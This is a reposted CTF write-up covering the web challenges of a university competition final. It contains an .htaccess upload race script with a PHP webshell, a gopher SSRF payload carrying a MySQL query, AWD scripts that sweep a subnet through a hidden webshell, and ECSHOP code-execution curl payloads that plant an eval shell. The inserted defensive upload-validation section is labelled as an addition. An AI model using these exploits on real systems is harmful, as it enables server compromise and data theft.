Third Jiangxi University Cyber Security Competition, offline finals: web challenge write-up

Congratulations to our team bleem on an excellent result in this competition. Keep it up!

Jeopardy

The morning Jeopardy session had two web challenges.

web1:

This challenge lets you upload an image. After using Burp to change the file type to php and uploading, you get the hint "let's see who is faster". Trying to upload .htaccess, one can guess that the intended route is a race condition: keep uploading .htaccess continuously, then upload an image webshell, and a shell is obtained.

Script for uploading .htaccess:

import requests
import time

# Read .htaccess once; the original reopened the file on every iteration and never closed it.
with open('.htaccess', 'rb') as fh:
    htaccess = fh.read()

# Re-send .htaccess continuously so that it is present when the image is uploaded.
while True:
    # Declared as image/jpeg because the upload form only accepts images.
    files = {'file': ('.htaccess', htaccess, 'image/jpeg')}
    r = requests.post('http://127.0.0.1/upload', files=files)
    time.sleep(0.5)


"""
.htaccess:

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
"""

Then upload a jpg one-line webshell and it is done.
shell.jpg:

<?php system('cat /flag.txt');?>
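The same upload handler from the defender's side, as an added example that is not part of the original write-up or the challenge code: every decision is made before a byte reaches disk (so there is no window for a race to win), dotfiles and Apache configuration names are refused outright, the client's Content-Type is ignored in favour of the file's magic bytes, and the stored name is chosen by the server. The `/upload` route, the allowed formats and `upload_dir` are assumptions for illustration.

```python
import os
import secrets

# Added example, not from the write-up: server-side upload checks that leave the
# .htaccess race nothing to win. Every decision is made before a byte touches disk,
# and the stored name and extension are chosen by the server, not the client.

ALLOWED_MAGIC = {  # permitted extension -> bytes the content must start with
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
APACHE_CONFIG_NAMES = {".htaccess", ".htpasswd"}  # read by Apache if AllowOverride permits


def validate_upload(filename: str, content: bytes) -> str:
    """Return the extension to store under, or raise ValueError.
    The client's Content-Type is deliberately not consulted: the write-up shows
    it being rewritten in Burp, so it proves nothing about the bytes."""
    base = os.path.basename(filename)  # drop any directory component
    if not base or base.startswith("."):  # rejects .htaccess and all other dotfiles
        raise ValueError("dotfiles are not accepted")
    if base.lower() in APACHE_CONFIG_NAMES:
        raise ValueError("server configuration files are not accepted")
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED_MAGIC:
        raise ValueError(f"extension {ext!r} is not allowed")
    if not content.startswith(ALLOWED_MAGIC[ext]):
        raise ValueError("content is not the image format its extension claims")
    if b"<?" in content:  # crude, but it catches the one-line shell.jpg above
        raise ValueError("image contains a PHP open tag")
    return ext


def store_upload(filename: str, content: bytes, upload_dir: str) -> str:
    """Validate first, then write under a random server-chosen name."""
    ext = validate_upload(filename, content)
    name = f"{secrets.token_hex(16)}.{ext}"
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(content)
    return name


def is_rejected(filename: str, content: bytes) -> bool:
    """True when validate_upload refuses the upload."""
    try:
        validate_upload(filename, content)
    except ValueError:
        return True
    return False
```

Pair this with `AllowOverride None` on the upload directory in the Apache configuration, so that even an .htaccess that slips past the handler is never read.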

web2:

In this challenge /etc/passwd can be read through the file protocol, but file:///flag.txt turns out not to exist, and reading index.php is forbidden. Viewing the page source with F12 shows that the flag is stored in MySQL. The first idea was to read the flag through the gopher protocol; I did not manage to construct the payload correctly during the competition, but whether or not this approach is right, take it as a learning note.

Connect to MySQL and run the query statement:


Capture the traffic with Wireshark, follow the stream, and filter out the red (client-sent) data.

Convert that data into a gopher URL:
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32

Because of the CRLF issue, append %0d%0a to the end when testing with curl.


AWD mode

The afternoon AWD session also had only two web challenges.

web1:
In web1, running ls -a in /var/www/html/ reveals a hidden file .shell.php. The word 'flag' is filtered, which can be bypassed with cat /fla*.
Script:

import requests

# Build the list of hosts 172.20.101.101 ... 172.20.112.101 in the AWD subnet.
ip1 = 'http://172.20.'
ip2 = '.101'
ip = [ip1 + str(i) + ip2 for i in range(101, 113)]

# 'flag' is filtered, so the glob /fla* is used instead.
data = {'cmd': 'system("cat /fla*");'}

for i in ip:
    try:
        r = requests.post(i + '/.shell.php', data=data, timeout=0.5)
        print(i)
        print(r.text)
    except requests.RequestException:
        # Host unreachable or timed out; move on to the next one.
        pass

web2:
ECSHOP code execution vulnerability.
First run the curl command payload.
Script attached:

import requests

'''
curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'



curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''


# Build the list of hosts 172.20.101.102 ... 172.20.112.102 in the AWD subnet.
ip1 = 'http://172.20.'
ip2 = '.102'
ip = [ip1 + str(i) + ip2 for i in range(101, 113)]

for i in ip:
    try:
        r = requests.post(i + '/okami.php?okami=system("cat /flag.txt");', timeout=0.5)
        print(i)
        print(r.text)
    except requests.RequestException:
        # Host unreachable or timed out; move on to the next one.
        pass


Reposted from blog.csdn.net/qq_41743240/article/details/108653888